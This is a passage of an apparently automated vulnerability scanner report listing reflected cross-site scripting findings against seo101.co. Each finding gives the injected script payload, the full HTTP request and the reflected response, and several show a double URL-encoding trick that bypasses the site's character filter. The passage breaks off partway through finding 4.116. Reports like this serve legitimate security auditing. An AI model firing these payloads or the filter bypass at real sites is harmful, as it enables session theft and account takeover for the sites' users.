Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ce0e4%253balert%25281%2529%252f%252f0b5546c25c5 was submitted in the REST URL parameter 2. This input was echoed as ce0e4;alert(1)//0b5546c25c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cce0e4%253balert%25281%2529%252f%252f0b5546c25c5/img/favicon.ico HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:53:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26839


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
<ce0e4;alert(1)//0b5546c25c5/img/favicon.ico SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.103. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload 501d0><script>alert(1)</script>f7e32a34d92 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/501d0><script>alert(1)</script>f7e32a34d92/img/favicon.ico HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:47:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26764


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</501d0><script>alert(1)</script>f7e32a34d92/img/favicon.ico SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.104. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 80276%253balert%25281%2529%252f%252f05cde4b08ac was submitted in the REST URL parameter 3. This input was echoed as 80276;alert(1)//05cde4b08ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img80276%253balert%25281%2529%252f%252f05cde4b08ac/favicon.ico HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:58:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26896


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img80276;alert(1)//05cde4b08ac/favicon.ico SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.105. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 406b8"><script>alert(1)</script>e23795f9a69 was submitted in the REST URL parameter 3. This input was echoed as 406b8\"><script>alert(1)</script>e23795f9a69 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img406b8"><script>alert(1)</script>e23795f9a69/favicon.ico HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26907


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img406b8\"><script>alert(1)</script>e23795f9a69/favicon.ico seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.106. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5070e%253balert%25281%2529%252f%252fc119c4d5a26 was submitted in the REST URL parameter 4. This input was echoed as 5070e;alert(1)//c119c4d5a26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico5070e%253balert%25281%2529%252f%252fc119c4d5a26 HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:03:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26883


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img/favicon.ico5070e;alert(1)//c119c4d5a26 SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.107. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ca7d"><script>alert(1)</script>956f69a5f0b was submitted in the REST URL parameter 4. This input was echoed as 6ca7d\"><script>alert(1)</script>956f69a5f0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico6ca7d"><script>alert(1)</script>956f69a5f0b HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:59:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26964


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img/favicon.ico6ca7d\"><script>alert(1)</script>956f69a5f0b seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.108. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3df0</script><script>alert(1)</script>2e02c98ebbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3Cd3df0</script><script>alert(1)</script>2e02c98ebbf/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:40:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26918


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<d3df0</
...[SNIP]...
<d3df0</script><script>alert(1)</script>2e02c98ebbf/title>
...[SNIP]...

4.109. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload e7ba4><script>alert(1)</script>dd61f70d1b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3Ce7ba4><script>alert(1)</script>dd61f70d1b3/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:35:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26886


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<e7ba4><script>alert(1)</script>dd61f70d1b3/title>
...[SNIP]...

4.110. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba38e"><script>alert(1)</script>441ae489a28 was submitted in the REST URL parameter 1. This input was echoed as ba38e\"><script>alert(1)</script>441ae489a28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3Cba38e"><script>alert(1)</script>441ae489a28/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:35:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26894


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<ba38e\"
...[SNIP]...
<ba38e\"><script>alert(1)</script>441ae489a28/title>
...[SNIP]...

4.111. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bccd2%253balert%25281%2529%252f%252fa9a7bca570b was submitted in the REST URL parameter 2. This input was echoed as bccd2;alert(1)//a9a7bca570b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cbccd2%253balert%25281%2529%252f%252fa9a7bca570b/img/logo.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:56:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26869


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
<bccd2;alert(1)//a9a7bca570b/img/logo.png SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.112. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload 952dc><script>alert(1)</script>1dd53549d4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/952dc><script>alert(1)</script>1dd53549d4e/img/logo.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:49:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26738


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</952dc><script>alert(1)</script>1dd53549d4e/img/logo.png SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.113. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e66dd"><script>alert(1)</script>e7def84f653 was submitted in the REST URL parameter 2. This input was echoed as e66dd\"><script>alert(1)</script>e7def84f653 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Ce66dd"><script>alert(1)</script>e7def84f653/img/logo.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:50:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26895


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
<e66dd\"><script>alert(1)</script>e7def84f653/img/logo.png seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.114. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afc52"><script>alert(1)</script>c6e04e7bc63 was submitted in the REST URL parameter 3. This input was echoed as afc52\"><script>alert(1)</script>c6e04e7bc63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/imgafc52"><script>alert(1)</script>c6e04e7bc63/logo.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:56:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26939


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</imgafc52\"><script>alert(1)</script>c6e04e7bc63/logo.png seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.115. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4d89d%253balert%25281%2529%252f%252f9276cd50de3 was submitted in the REST URL parameter 3. This input was echoed as 4d89d;alert(1)//9276cd50de3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img4d89d%253balert%25281%2529%252f%252f9276cd50de3/logo.png HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:03:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26851


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img4d89d;alert(1)//9276cd50de3/logo.png SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.116. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png

Issue detail

